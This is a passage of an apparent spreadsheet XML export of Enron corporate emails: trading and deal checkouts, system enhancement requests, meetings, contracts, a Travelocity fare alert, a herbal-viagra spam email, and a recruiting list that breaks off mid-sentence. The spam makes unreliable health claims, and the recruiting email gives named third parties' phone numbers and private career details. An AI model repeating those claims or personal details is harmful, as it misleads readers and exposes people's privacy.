To MANAGE all your Forbes.com newsletter accounts or change your _x000D_
delivery address, join us as a member at:_x000D_
http://tm0.com/forbes/sbct.cgi?s=167547968&amp;i=412162&amp;d=2008190_x000D_
------------------------------------------------------------------</t>
  </si>
  <si>
    <t>Thu, 30 Nov 2000 06:07:00 -0800 (PST)</t>
  </si>
  <si>
    <t>projects list</t>
  </si>
  <si>
    <t xml:space="preserve">Stinson,_x000D_
_x000D_
Just want to give you a quick update about the current projects on my plate,_x000D_
so that you can update your blackbroad_x000D_
_x000D_
1) WTI trading simulation V.2, ready for you to review_x000D_
2) Storage valuation for Paul Bieinawski (new)_x000D_
3) Product production margin modeling for Doug Friedman (new)_x000D_
     need to model explicitly the jump piece.  Some new ideas for discussion._x000D_
4) eSpeed warrant valuation for Randy Petersen (new)_x000D_
5) Correlation skew for Larry May_x000D_
6) Credit exposure model, Alex finished the coding, testing next_x000D_
_x000D_
Have you had a chance to review Brad's back testing results for the storage _x000D_
model ?_x000D_
_x000D_
_x000D_
Zimin_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
</t>
  </si>
  <si>
    <t>Wed, 7 Mar 2001 00:19:00 -0800 (PST)</t>
  </si>
  <si>
    <t xml:space="preserve">Mike just got back to me on this - these are good deals that he forgot to _x000D_
write down. I'm entering them right now, and I'll let you know the deal _x000D_
numbers in a second._x000D_
_x000D_
Kate_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
Evelyn Metoyer@ENRON_x000D_
03/07/2001 08:13 AM_x000D_
To: Kate Symes/PDX/ECT@ECT_x000D_
cc:  _x000D_
_x000D_
Subject:   _x000D_
_x000D_
_x000D_
Hi Kate,_x000D_
What's the status of these two deals?_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
   Kate Symes @ ECT                03/06/2001 05:41 PM_x000D_
_x000D_
To: Evelyn Metoyer/Corp/Enron@ENRON_x000D_
cc:  _x000D_
_x000D_
Subject: Re: 3/06/ Checkout  _x000D_
_x000D_
Evelyn, I'm so sorry I haven't found these deals yet! I've left messages with _x000D_
Mike Swerzbin and Matt Motley, but I don't see these trades in either of _x000D_
their logs - or even in the short term trade logs. One of those guys should _x000D_
be back in the office momentarily, and I'll let you know when I've talked to _x000D_
them._x000D_
_x000D_
Kate_x000D_
_x000D_
_x000D_
_x000D_
Evelyn Metoyer@ENRON_x000D_
03/06/2001 03:15 PM_x000D_
To: Kate Symes/PDX/ECT@ECT_x000D_
cc:  _x000D_
_x000D_
Subject: 3/06/ Checkout_x000D_
_x000D_
_x000D_
_x000D_
Amerex West_x000D_
All deals checked out fine._x000D_
_x000D_
_x000D_
_x000D_
_x000D_
Bloomberg_x000D_
All deals checked out fine._x000D_
_x000D_
_x000D_
Prebon_x000D_
_x000D_
Mike Swerbin_x000D_
I am missing the following deals:_x000D_
Enron buys from PGET 25 mw of May PV at $272_x000D_
Enron sells to EES 25 mw of May PV at $268._x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
</t>
  </si>
  <si>
    <t>Thu, 26 Apr 2001 00:57:00 -0700 (PDT)</t>
  </si>
  <si>
    <t>frozenset({'gasconference@ziffenergy.com'})</t>
  </si>
  <si>
    <t>Registration for "North American Gas Storage Conference" - June 22,_x000D_
 2001</t>
  </si>
  <si>
    <t>Please register Wincenty J. (Vince) Kaminski, Managing Director, Research_x000D_
Enron Wholesale Services, to the subject conference to be held in Houston_x000D_
on June 22, 2001._x000D_
_x000D_
If you need more information, please contact me at:_x000D_
_x000D_
Shirley Crenshaw_x000D_
Administrative Coordinator_x000D_
Enron Research Group_x000D_
713-853-5290_x000D_
email:  Shirley.Crenshaw@enron.com</t>
  </si>
  <si>
    <t>Sun, 10 Mar 2002 10:29:20 -0800 (PST)</t>
  </si>
  <si>
    <t>Sunday, March 10, 2002_x000D_
_x000D_
Dear Debra,_x000D_
_x000D_
Travelocity Fare Watcher, your personal airfare tracking_x000D_
service, has found fare changes in 2 of your markets._x000D_
_x000D_
Note: Fares change quickly and sell out fast. Visit Travelocity_x000D_
now to take advantage of this great opportunity!  Click on this_x000D_
link or paste the URL into your browser:_x000D_
http://dps1.travelocity.com:80/fwemindiv.ctl?fw=99091015983150&amp;Service=TRAVELOCITY&amp;LANG=EN_x000D_
_x000D_
HAVE YOUR TRAVEL NEEDS CHANGED?_x000D_
_x000D_
Looking to go someplace new? Be sure to update your Fare Watcher_x000D_
subscription to include your favorite destinations._x000D_
_x000D_
FARES_x000D_
_x000D_
_x000D_
*  QHO-TUL   FROM: Houston All Airports (QHO)_x000D_
             TO:   Tulsa, OK (TUL)_x000D_
   PRICE:    NEW PRICE        WAS        DIFFERENCE_x000D_
             ---------      -------      ----------_x000D_
             $139.00        $166.00      -$27.00_x000D_
_x000D_
*  QHO-PHX   FROM: Houston All Airports (QHO)_x000D_
             TO:   Phoenix, AZ (PHX)_x000D_
   PRICE:    NEW PRICE        WAS        DIFFERENCE_x000D_
             ---------      -------      ----------_x000D_
             $189.00        $147.00      +$42.00_x000D_
_x000D_
_x000D_
_x000D_
GREAT HOTEL DEALS!_x000D_
_x000D_
Travelocity.com offers Value Rates at great hotels in:_x000D_
Phoenix, AZ (PHX) starting at just $49_x000D_
Click: http://dps1.travelocity.com:80/hotsrqst.ctl?mode=2&amp;airport=PHX&amp;rate_cat=V_x000D_
_x000D_
_x000D_
Thank you for choosing Travelocity as your one-stop travel_x000D_
resource!_x000D_
_x000D_
Sincerely,_x000D_
_x000D_
The Travelocity Team_x000D_
Travelocity.com - Go Virtually Anywhere_x000D_
http://www.travelocity.com/_x000D_
_x000D_
----------------------------------------------------------------_x000D_
_x000D_
VACATION DEALS!_x000D_
_x000D_
Hot deals to the Caribbean, Las Vegas, and more!_x000D_
http://leisure.travelocity.com/RealDeals/0,2942,TRAVELOCITY_VAC,00.html_x000D_
_x000D_
CRUISE DEALS!_x000D_
_x000D_
Don't miss a look at our incredible Cruise Deals! Updated daily,_x000D_
find the voyage that suits your budget!_x000D_
http://leisure.travelocity.com/RealDeals/0,2942,TRAVELOCITY_CRU,00.html_x000D_
_x000D_
SAVE $75 IN AIRFARE_x000D_
_x000D_
Save up to $75 on Airline Tickets!_x000D_
Join the Travelocity Preferred Program and you'll receive up to $75_x000D_
in cash rebates on your next three flights, hotel savings and room_x000D_
upgrades, up to 20% off at restaurants nationwide, and more.  Join today!_x000D_
http://leisure.travelocity.com/preferred/?source=PM_x000D_
_x000D_
EARN FREE TRAVEL. NO RESTRICTIONS!_x000D_
_x000D_
The NEW Travelocity World MasterCard_x000D_
Earn points towards free travel with new Travelocity MasterCard!_x000D_
You'll earn 1 point for every dollar spent. Earn 8,000 points_x000D_
and you'll receive $100 off your next Travelocity.com booking._x000D_
We'll spot you 4,000 points to get started, so you are already_x000D_
half way there!_x000D_
Visit http://www.travelocitycard.com/index.cgi?mktcode=2201128602&amp;PageID=stnd to apply._x000D_
_x000D_
IMPORTANT FARE INFORMATION:_x000D_
_x000D_
*Fares shown are for one adult and are subject to_x000D_
additional charges, including, but not limited to, Passenger Facility_x000D_
Charges (ranging from $2-$18), Federal Segment Fees of $3.00 per segment_x000D_
(defined as a takeoff and a landing), September 11th Security Fee_x000D_
(maximum of $5 one way or $10 round trip), and taxes/fees associated_x000D_
with international itineraries up to $113. Fuel surcharges, if_x000D_
applicable, are included in the fares listed._x000D_
_x000D_
Total fare per passenger, including all charges, will always_x000D_
be displayed to you prior to final ticket purchase. Please note_x000D_
that fares are subject to restrictions, may not be available on_x000D_
all flights, and may change without notice. For detailed descriptions_x000D_
of the fare rules, click on the corresponding rules link._x000D_
_x000D_
CHANGE OR CANCEL YOUR SUBSCRIPTION TO FAREWATCHER EMAIL_x000D_
http://dps1.travelocity.com:80/fwemsub.ctl?Service=TRAVELOCITY&amp;LANG=EN_x000D_
_x000D_
UPDATE YOUR EMAIL ADDRESS_x000D_
http://dps1.travelocity.com:80/fwemsub.ctl?Service=TRAVELOCITY&amp;LANG=EN_x000D_
_x000D_
RETRIEVE YOUR PASSWORD_x000D_
http://dps1.travelocity.com:80/lognpwdform.ctl?Service=TRAVELOCITY&amp;LANG=EN</t>
  </si>
  <si>
    <t>Fri, 14 Sep 2001 06:20:24 -0700 (PDT)</t>
  </si>
  <si>
    <t>RE: Origination Track Meeting</t>
  </si>
  <si>
    <t xml:space="preserve">Dave. is this the meeting time on monday?  _x000D_
_x000D_
BT _x000D_
_x000D_
 -----Original Appointment-----_x000D_
From: 	Rode, Tina   On Behalf Of Forster, David_x000D_
Sent:	Wednesday, September 12, 2001 2:50 PM_x000D_
To:	Luce, Laura; Tycholiz, Barry; Vickers, Frank W.; Lagrasta, Fred; Redmond, Brian; Baughman, Edward D.; Lemmons Jr., Billy; Bland Jr., Ted C._x000D_
Subject:	Updated: Origination Track Meeting_x000D_
When:	Monday, September 17, 2001 10:00 AM-11:00 AM (GMT-06:00) Central Time (US &amp; Canada)._x000D_
Where:	EB3530_x000D_
</t>
  </si>
  <si>
    <t>Tue, 20 Nov 2001 11:57:05 -0800 (PST)</t>
  </si>
  <si>
    <t>frozenset({'george.phillips@enron.com'})</t>
  </si>
  <si>
    <t>RE: Eterra</t>
  </si>
  <si>
    <t>Looks ok overall but here are a couple of suggestions:_x000D_
_x000D_
Make price/mgw  an optional field in the deal entry section of eterra.  _x000D_
2B should be a higher priority. Also, an alternative to 2B is to have a drop-down box within eTerra to display the corresponding name of the counterparty.  _x000D_
_x000D_
_x000D_
[Phillips, George]   _x000D_
 -----Original Message-----_x000D_
From: 	Capasso, Joe  _x000D_
Sent:	Tuesday, November 20, 2001 3:10 AM_x000D_
To:	Forney, John M._x000D_
Subject:	FW: Eterra_x000D_
_x000D_
_x000D_
_x000D_
Madup,_x000D_
_x000D_
In reference to Eterra, I have prioritized some enhancements to the system that will improve its usage and accuracy.  When using Eterra, some tasks are difficult to complete and can result in mismatches in the Ercot Portal.  I will identify some of the difficult tasks and I will make some suggestions on enhancements.  _x000D_
In addition, I realize that we are working with time constraints and limited personnel._x000D_
_x000D_
I will categorize the list based on Priority 1, 2 &amp; 3._x000D_
_x000D_
Priority 1 - Very important and needs to be completed immediately_x000D_
Priority 2 - Important and needs to be completed within the next 30 days_x000D_
Priority 3 - Moderate importance, easy tasks can be completed at programmers convenience._x000D_
_x000D_
_x000D_
Priority 1A:_x000D_
_x000D_
Allow the Deal Entry screen to accept single entry trades, such as a simultaneous Buy from Counterparty A in the South Zone and a Sell to Counterparty B in the North Zone.  Currently, this has to be done by entering two trades, a purchase from Counterparty A (South Zone) to the Hourly Ercot Book and a second trade, a sell from the Hourly Ercot Book to Counterparty B.  I realize that we have a problem with the transmission between the North and South Zones and that is what makes this a difficult enhancement.  _x000D_
_x000D_
Priority1B:_x000D_
_x000D_
Change the process of increasing the Frontera generation.  The current process is to input a buy from Frontera and a sell to Frontera.  This is not very intuitive and causes some confusion.  Why can't we input a buy from Frontera just as we would with any other trade? It could be as simple as clicking a box to indicate that Frontera (i.e. - EPMI) should be adjusted on the resource side and not EPMI on the obligation side._x000D_
_x000D_
Priority1C:_x000D_
_x000D_
Eterra should not write over any trades that were input manually into the Ercot Portal._x000D_
Is there any way that we can make it identify a trade that was input manually into the portal?_x000D_
When it finds one then it should not overwrite this trade._x000D_
_x000D_
Priority2A:_x000D_
_x000D_
Undo Button - On various occasions, we have sent Bal Day trades to the QSE MOS/Ercot Portal and _x000D_
it was not the result that we had expected.  Therefore, the trader has to manually change each of the trades. This can be a very time consuming process._x000D_
Is there a way to have an UNDO button (similar to the Excel UNDO key) to retract the trade information from the QSE MOS or Portal?_x000D_
_x000D_
_x000D_
Priority2B:_x000D_
_x000D_
Change the short name in &lt;internal counterparty&gt; &amp; &lt;external counterparty&gt; to the actual long name, (i.e. - elpasomeren to El Paso Merchant Energy)_x000D_
Reason: It is just difficult to read. I brought this up with Sasha and he said it would be a quick fix, but it is still not done._x000D_
_x000D_
Proirity3A:_x000D_
_x000D_
Please give us a list of the Counterparties and their appropriate QSE names, (i.e. - El Paso Merchant is actually APX)_x000D_
This helps us identify what it will effect in the QSE MOS and Portal (for example, elpasomeren is converted into APX).  _x000D_
But does ELP or ELPASELECOM convert to APX also?_x000D_
_x000D_
Priority3B:_x000D_
_x000D_
Match Flow Period to automatically update the Contract Date.  This is one less step that we need to worry about._x000D_
_x000D_
_x000D_
_x000D_
The above mentioned enhancements will allow us to quickly and accurately update the QSE MOS &amp; Ercot Portal. _x000D_
In addition, it will allow us to quickly correct the portal if a mistake occurs._x000D_
_x000D_
If you need additional clarification on any of these topics, I would be happy to meet with you to discuss this further._x000D_
I will be working days on Monday, Nov. 26th - Thursday, Nov 29th._x000D_
_x000D_
Thanks,_x000D_
Joe Capasso_x000D_
_x000D_
  _x000D_
PS - Below is an email that outlines my conversation with Sasha on November 3rd.  Unfortunately, none of the "quick fixes" have been completed yet._x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
 -----Original Message-----_x000D_
From: 	Capasso, Joe  _x000D_
Sent:	Saturday, November 03, 2001 4:55 PM_x000D_
To:	Forney, John M._x000D_
Cc:	'Sashaim@yahoo.com,'; McElreath, Alexander; Olinde Jr., Steve; Phillips, George; Oh, Seung-Taek_x000D_
Subject:	Eterra_x000D_
_x000D_
John,_x000D_
_x000D_
I met with Sasha today for approx. 3 hours._x000D_
We reviewed the exact process for inputting data into Eterra and verifying the trades prior to being sent to the QSE MOS._x000D_
_x000D_
Here are some suggestions that I made to Sasha for improving Eterra (the top of the list is the highest priority):_x000D_
_x000D_
 - Allow the Deal Entry screen to accept single entry trades, such as a simultaneous Buy from Calpine (South Zone) and a Sell to FPL (North Zone)._x000D_
   Currently, this has to be done by entering two trades, a purchase from Calpine (South Zone) to the Hourly Ercot book and a second entry of Hourly Ercot book _x000D_
   to FPL (North Zone).  Sasha said he is working on this, but problems are occurring due to the transmission between South and North._x000D_
_x000D_
 - Change the process of increasing the Frontera generation.  The current process is to input a buy from Frontera into the Frontera book._x000D_
   This is not very intuitive and we are still trying to work out an easier process.  (Possibly even having a button that we can click to indicate that_x000D_
   it is a purchase from Frontera.  Essentially, this would increase the EPMI mw's in the Ercot Portal.)_x000D_
_x000D_
 - Change the short name in &lt;internal counterpary&gt; &amp; &lt;external counterparty&gt; to the actual long name, (i.e. - elpasomeren to El Paso Merchant Energy)_x000D_
_x000D_
 - Give us a list of Counterparties and the appropriate QSE, (i.e. - El Paso Merchant is actually APX)_x000D_
    So that we know what it will affect in the Ercot Portal._x000D_
_x000D_
 - Match flow date to automatically update the Contract date.  One less step that we need to worry about._x000D_
_x000D_
I tried to impress upon Sasha that in trading "time is of the essence" and that we don't have much time to input data._x000D_
Therefore, we need to streamline the deal entry process and to make it more user friendly._x000D_
I realize that the first two items will take some time, but the last 3 items should be quick fixes._x000D_
_x000D_
I hope this helps._x000D_
_x000D_
Joe Capasso</t>
  </si>
  <si>
    <t>Sat, 24 Nov 2001 02:42:37 -0800 (PST)</t>
  </si>
  <si>
    <t>frozenset({'xingdenburg797@eudoramail.com'})</t>
  </si>
  <si>
    <t>frozenset({'undisclosed.recipients@mailman.enron.com'})</t>
  </si>
  <si>
    <t>free trial herbal viagra good for men and women</t>
  </si>
  <si>
    <t xml:space="preserve">30 Day Trial Offer ! 100% risk free_x000D_
_x000D_
All Natural Herbal Formula_x000D_
_x000D_
Highly Effective, very Potent_x000D_
_x000D_
NO SIDE EFFECT_x000D_
_x000D_
Work for both Men and Women!_x000D_
_x000D_
Increased Desire_x000D_
Increased Stamina_x000D_
Increased Sensation_x000D_
Increased Endurance_x000D_
Increased Satisfaction_x000D_
Increased Blood Flow_x000D_
To claim your 30 day Trial_x000D_
Visit our Website Today_x000D_
http://www.free-bizzz.biz/v609a.html_x000D_
_x000D_
Please do yourself and your partner a Favor!_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
To be remove from future mailings_x000D_
go to http://www.eee-bizzz.com/remove.html_x000D_
</t>
  </si>
  <si>
    <t>Fri, 23 Jun 2000 02:04:00 -0700 (PDT)</t>
  </si>
  <si>
    <t>Re: Vitro</t>
  </si>
  <si>
    <t xml:space="preserve">As requested._x000D_
_x000D_
Please call if you need anything else.  _x000D_
_x000D_
By the way, I have the original contracts in my office._x000D_
_x000D_
Kay_x000D_
---------------------- Forwarded by Kay Mann/Corp/Enron on 06/23/2000 09:03 _x000D_
AM ---------------------------_x000D_
_x000D_
_x000D_
Brian D Barto@ENRON_DEVELOPMENT_x000D_
06/20/2000 02:00 PM_x000D_
To: Kay Mann/Corp/Enron@ENRON, John.Schroeder@ps.ge.com, _x000D_
jeffreye.smith@ps.ge.com_x000D_
cc:  _x000D_
_x000D_
Subject: Re: Vitro  _x000D_
_x000D_
_x000D_
_x000D_
_x000D_
Kay, John &amp; Jeff:_x000D_
_x000D_
Final files of the Onshore Contract, Offshore Contract and Consolication _x000D_
Agreement _x000D_
</t>
  </si>
  <si>
    <t>Mon, 17 Jul 2000 09:35:00 -0700 (PDT)</t>
  </si>
  <si>
    <t xml:space="preserve">FYI._x000D_
_x000D_
We are staying at the Richmond Marriott or Marriott Richmond, whichever it is._x000D_
_x000D_
What are your plans?_x000D_
_x000D_
Kay_x000D_
---------------------- Forwarded by Kay Mann/Corp/Enron on 07/17/2000 04:34 _x000D_
PM ---------------------------_x000D_
_x000D_
_x000D_
Heather Kroll@ECT_x000D_
07/17/2000 04:33 PM_x000D_
To: Kay Mann/Corp/Enron@Enron_x000D_
cc:  _x000D_
_x000D_
Subject: Edgecombe PPA_x000D_
_x000D_
Just got this, haven't had a chance to review._x000D_
_x000D_
H_x000D_
---------------------- Forwarded by Heather Kroll/HOU/ECT on 07/17/2000 04:33 _x000D_
PM ---------------------------_x000D_
_x000D_
_x000D_
John_Mable@dom.com on 07/17/2000 04:17:42 PM_x000D_
To: Ozzie Pagan/HOU/ECT@ECT, Heather Kroll/HOU/ECT@ECT_x000D_
cc: Jeff_L._Jones@dom.com, Gary_Edwards@dom.com _x000D_
Subject: Edgecombe PPA_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
After review of your draft PPA, we have identified the attached list of key_x000D_
issues.   We are available to discuss them prior to Thursday's meeting if you_x000D_
wish, or we can go over them as the first part of our meeting on Thursday._x000D_
_x000D_
We look forward to seeing you on Thursday._x000D_
_x000D_
(See attached file: Contract issues july 17.doc)_x000D_
_x000D_
 - Contract issues july 17.doc_x000D_
_x000D_
_x000D_
</t>
  </si>
  <si>
    <t>Wed, 25 Oct 2000 09:09:00 -0700 (PDT)</t>
  </si>
  <si>
    <t>Re: October 26 Corporate HR Leadership Team Meeting</t>
  </si>
  <si>
    <t xml:space="preserve">I am not at all surprised!!!!  Michelle_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
Andrea Yowman@ENRON_x000D_
10/25/2000 03:58 PM_x000D_
To: Michelle Cash/HOU/ECT@ECT_x000D_
cc:  _x000D_
Subject: Re: October 26 Corporate HR Leadership Team Meeting  _x000D_
_x000D_
Already working on it... _x000D_
ay_x000D_
_x000D_
_x000D_
_x000D_
Michelle Cash@ECT_x000D_
10/25/2000 03:38 PM_x000D_
To: Andrea Yowman/Corp/Enron@ENRON_x000D_
cc:  _x000D_
_x000D_
Subject: October 26 Corporate HR Leadership Team Meeting_x000D_
_x000D_
Andrea, would it be possible to update our list to show the current progress _x000D_
on the "30 days" items?  I think you have a better handle on the timelines _x000D_
than I would.  Thanks.  Michelle_x000D_
_x000D_
---------------------- Forwarded by Michelle Cash/HOU/ECT on 10/25/2000 03:38 _x000D_
PM ---------------------------_x000D_
_x000D_
_x000D_
Gerry Gibson@ENRON_x000D_
10/25/2000 11:49 AM_x000D_
To: Andrea Yowman/Corp/Enron@ENRON, Brian Schaffer/Corp/Enron@ENRON, Kimberly _x000D_
Rizzi/HOU/ECT@ECT, Cynthia Barrow/HR/Corp/Enron@ENRON, Sheila _x000D_
Walton/HOU/ECT@ECT, Brad Coleman/HOU/ECT@ECT, Sarah A Davis/HOU/ECT@ECT, _x000D_
Laura Schwartz/Corp/Enron@Enron, Michelle Cash/HOU/ECT@ECT, Mary _x000D_
Joyce/HR/Corp/Enron@ENRON, Bob Sparger/Corp/Enron@Enron, Cindy _x000D_
Olson/Corp/Enron@ENRON, Gina Corteselli/Corp/Enron@Enron, Kathryn _x000D_
Schultea/HR/Corp/Enron@ENRON, Andrew Lawrence/HR/Corp/Enron@ENRON, Pam _x000D_
Butler/HR/Corp/Enron@ENRON, John Hay/Enron Communications@Enron _x000D_
Communications, Donald Miller/Corp/Enron@Enron, Dave Schafer/OTS/Enron@ENRON, _x000D_
Karen Moore/NA/Enron@ENRON_x000D_
cc: Hilda Bourgeois-Galloway/Corp/Enron@ENRON, Bobbie Power/Corp/Enron@ENRON _x000D_
Subject: October 26 Corporate HR Leadership Team Meeting_x000D_
_x000D_
Hi Folks:_x000D_
_x000D_
Enclosed is the agenda for the Corporate HR Leadership Team Meeting that will _x000D_
take place tomorrow in the Executive Board Room (50th Floor) from 9:00 to _x000D_
10:00. Please note...we will meet in the Board Room not the Dining room on _x000D_
the Mezzanine level... Our primary meeting objective will be to review where _x000D_
the team stands implementing the short term Action Plans for the Key Focus _x000D_
Areas established at the retreat. I understand that some very good work has _x000D_
been done and that several potential "Wows" are either currently being _x000D_
implemented or about to launch. _x000D_
_x000D_
We look forward to getting the latest status reports relative to _x000D_
accomplishing these critical activities and keeping the momentum flowing._x000D_
_x000D_
Regards, Gerry Gibson_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
</t>
  </si>
  <si>
    <t>Thu, 16 Nov 2000 04:20:00 -0800 (PST)</t>
  </si>
  <si>
    <t>frozenset({'frank.davis@enron.com', 'marilyn.colbert@enron.com', 'janie.aguayo@enron.com', 'nidia.mendoza@enron.com', 'melissa.murphy@enron.com', 'brent.hendry@enron.com', 'william.bradford@enron.com', 'amber.ebow@enron.com', 'lisa.lees@enron.com', 'tanya.rohauer@enron.com', 'susan.bailey@enron.com', 'mary.gosnell@enron.com', 'gordon.heaney@enron.com', 'wendi.lebrocq@enron.com', 'russell.diamond@enron.com', 'scott.tackett@enron.com', 'mary.solmonson@enron.com', 'brant.reves@enron.com', 'jason.williams@enron.com', 'diane.ellstrom@enron.com', 'laurel.adams@enron.com', 'andrea.guillen@enron.com', 'larry.hunter@enron.com', 'dale.neuner@enron.com', 'bridgette.anderson@enron.com', 'dianne.seib@enron.com', 'tom.moran@enron.com', 'edward.sacks@enron.com', 'mark.taylor@enron.com', 'carrie.southard@enron.com', 'celeste.cisneros@enron.com', 'anthony.campos@enron.com', 'adnan.patel@enron.com', 'bill.hare@enron.com', 'bradley.diebner@enron.com', 'sara.shackleton@enron.com', 'diane.anderson@enron.com', 'lesli.campbell@enron.com', 'jason.moore@enron.com', 'debbie.brackett@enron.com', 'camille.gerard@enron.com', 'samuel.schott@enron.com', 'lynn.shivers@enron.com', 'veronica.espinoza@enron.com', 'tana.jones@enron.com', 'tracy.ngo@enron.com', 'karen.lambert@enron.com', 'stacey.richardson@enron.com', 'carol.clair@enron.com', 'paul.radous@enron.com', 'robert.bruce@enron.com', 'leslie.reeves@enron.com', 'derek.bailey@enron.com', 'samantha.boyd@enron.com', 'jarrod.cyprow@enron.com', 'mary.cook@enron.com', 'kevin.meredith@enron.com', 'bob.bowen@enron.com', 'bernice.rodriguez@enron.com'})</t>
  </si>
  <si>
    <t>We have recieved an executed Assignment and Assumption Agreement effective =_x000D_
as=20_x000D_
of September 20, 2000 between Enron North America Corp. (=01&amp;ENA=018) and I=_x000D_
dacorp=20_x000D_
Energy Solutions (=01&amp;Idacorp=018).  This Agreement assigns an outstanding =_x000D_
trade=20_x000D_
between Idacorp and Columbia Energy Services (=01&amp;CES=018) from CES to ENA,=_x000D_
 subject=20_x000D_
to the ISDA Master Agreement between Idacorp and ENA dated as of June 8, 20=_x000D_
00._x000D_
_x000D_
Copies will be distributed._x000D_
_x000D_
Stephanie Panus</t>
  </si>
  <si>
    <t>Thu, 25 May 2000 07:42:00 -0700 (PDT)</t>
  </si>
  <si>
    <t>frozenset({'toni.graham@enron.com', 'hector.mcloughlin@enron.com'})</t>
  </si>
  <si>
    <t>People to consider recruiting</t>
  </si>
  <si>
    <t xml:space="preserve">I asked my new hire to suggest names of people that she knows that would be _x000D_
good for to consider hiring.  Here is her response.  Tony Vasut had called _x000D_
her and asked for this list as well.  Do you have him keyed in on our blitz _x000D_
effort for hiring of risk personnel?  Or is he working on some other _x000D_
initiative?  I have not reviewed the names nor Shona's comments in detail _x000D_
yet, but I wanted to pass these along for inclusion in our efforts.  --Sally _x000D_
---------------------- Forwarded by Sally Beck/HOU/ECT on 05/25/2000 02:39 PM _x000D_
---------------------------_x000D_
   _x000D_
	_x000D_
	_x000D_
	From:  Shona Wilson @ ENRON                           05/25/2000 09:00 AM_x000D_
	_x000D_
_x000D_
To: Tony Vasut/HOU/ECT@ECT, Sally Beck/HOU/ECT@ECT_x000D_
cc:  _x000D_
Subject: People to consider recruiting_x000D_
_x000D_
As requested, I've created a list of people who:_x000D_
have mentioned to me that they are interested in changing careers/companies or_x000D_
I think would be a great asset to Enron._x000D_
_x000D_
I've jotted down what I know about each person and I hope you find it _x000D_
useful.  I've organized it from most experienced to least experienced.  If _x000D_
you would like to talk me about any of these people or ask me to contact _x000D_
them, just let me know._x000D_
_x000D_
Andy Dunn - until 2 weeks ago he was a director in the PwC risk management _x000D_
practice.  Due to a falling out between Andy and the partners (not client _x000D_
related), he left the firm.  He is extremely well respected by both the audit _x000D_
and the non-audit personnel, and his leaving came as an unexpected surprise.  _x000D_
I have worked with him on a number of occasions and would highly recommend _x000D_
him to Enron.  The downside to Andy is that he lives in Denver, is used to _x000D_
travelling a lot, but, at the last time we spoke (a few months ago), is not _x000D_
interested in leaving Denver.  His cell phone (if still in use) is 303 807 _x000D_
0040._x000D_
_x000D_
Mark (Allan) Smith - Mark is in the PwC energy risk management practice in _x000D_
Houston.  We worked very closely together throughout 1999 on projects for _x000D_
Coral Energy and Equiva trading.  Prior to working at PwC, Mark was at BP for _x000D_
15 years where he had many different roles (he worked as a crude trader, _x000D_
products trader, he worked in the risk management department, in the refinery _x000D_
itself as an engineer).  Mark was excellent to work with.  Clients are _x000D_
extremely impressed with his knowledge and background.  I would highly _x000D_
recommend him for a leadership role at Enron.  I spoke to him yesterday and _x000D_
he is interested in talking with you.  His direct number is 713 356 4233.  _x000D_
His cell phone number is 713 412 3890._x000D_
_x000D_
Alan Beaton - senior manager KPMG's systems control group (IRM).  He works _x000D_
with my husband.  I know him on a personal basis.  He is trying to find _x000D_
opportunities outside of the audit/consulting area (general line 713 319 _x000D_
2000)._x000D_
_x000D_
Marilyn Chee - She currently works for Equiva trading, manager in-charge of _x000D_
accounting for derivatives.  Her role has expanded to encompass FAS 133 and _x000D_
all mtm accounting entries.  She liases with all book heads (crude and all _x000D_
products).  In the past, she worked in the Texaco internal audit department.  _x000D_
She was my main contact at Equiva when I was at PwC.  She is extremely _x000D_
diligent and very professional.  I enjoyed working with her greatly and have _x000D_
to say she was one of the best people I have worked with in the capacity of a _x000D_
client/professional relationship.    Marilyn has a lot of responsibilities at _x000D_
the alliance and is extremely well respected.  She has had a difficult year _x000D_
as she is doing a job that should be done by 3+ people.  She has mentioned to _x000D_
me that she is not happy about the fact that her load continues to increase, _x000D_
and has even mentioned finding another job.  However, due to the fact that _x000D_
she is so well respected where she is, she may be difficult to recruit (713 _x000D_
277 6280).  If you contact her I would not want my name associated with it _x000D_
due to the PwC/alliance relationship._x000D_
_x000D_
Rebecca Crider - She has been working at Coral Energy for approximately a _x000D_
year, reporting to the VP of risk control.  Before that she was an audit _x000D_
manager at AA.  I have worked with her briefly and she seemed very _x000D_
conscientious.  I do not know if she is looking or not, but its worth a try! _x000D_
(713 230 3000 general line)._x000D_
_x000D_
Kim Nelson - She is a manager in the risk group at AA, and just transferred _x000D_
over from KPMG.  I have not met her, but I did hear that she is not doing _x000D_
what she had expected at AA.  I don't know her number but you could reach her _x000D_
at the general AA line._x000D_
_x000D_
Kevin Schroder - audit manager at KPMG in the energy department.  I do not _x000D_
know him, but do know he is looking for opportunities outside the _x000D_
audit/consulting area (general line 713 319 2000)._x000D_
_x000D_
Keith Considine - He is currently a senior accountant at PwC.  He is the best _x000D_
senior PwC Houston has, as well as probably one of the best people I have _x000D_
ever worked with (the top of his class).  Although he only has 4 years of _x000D_
work experience (all at PwC), he performs in a manager capacity.  He worked _x000D_
for me on the Coral Energy audit engagement and received an excellent _x000D_
evaluation from both myself and the partners (we all agreed that he is one of _x000D_
the best people any of us have seen or worked with).  He is currently working _x000D_
on a project at one of PwC's clients to standardize their mid office _x000D_
processes .  He definitely does not see himself as a long time employee of _x000D_
PwC, but is currently planning on staying there until he is promoted to _x000D_
manager.  I actually recommended him for a promotion to manager at July 1 _x000D_
this year, but due to capacity issues, I don't expect that the promotion will _x000D_
be approved. Since I've only been with Enron a short time and would like to _x000D_
continue good relations with PwC, I would appreciate whoever contacts Keith _x000D_
to elude that it is someone else other than myself who gave you his name. His _x000D_
number is 713 356 5617._x000D_
_x000D_
Dave Simpson - analyst at Koch Energy in Houston, has a degree in accounting _x000D_
and has work experience of about 9 months.  He is very interested in leaving _x000D_
Koch.  I know him on a person basis, but have not worked with him.  He is a _x000D_
good guy and very likeable.  I don't have his phone number, but should be _x000D_
reachable through the general number for Koch._x000D_
_x000D_
Admin assistants_x000D_
_x000D_
Connie Shugart - she is currently working at PwC as an administrative _x000D_
assistant.  She is also involved in recruiting experienced personnel for _x000D_
PwC's audit and internal audit service lines.  She is very interested in _x000D_
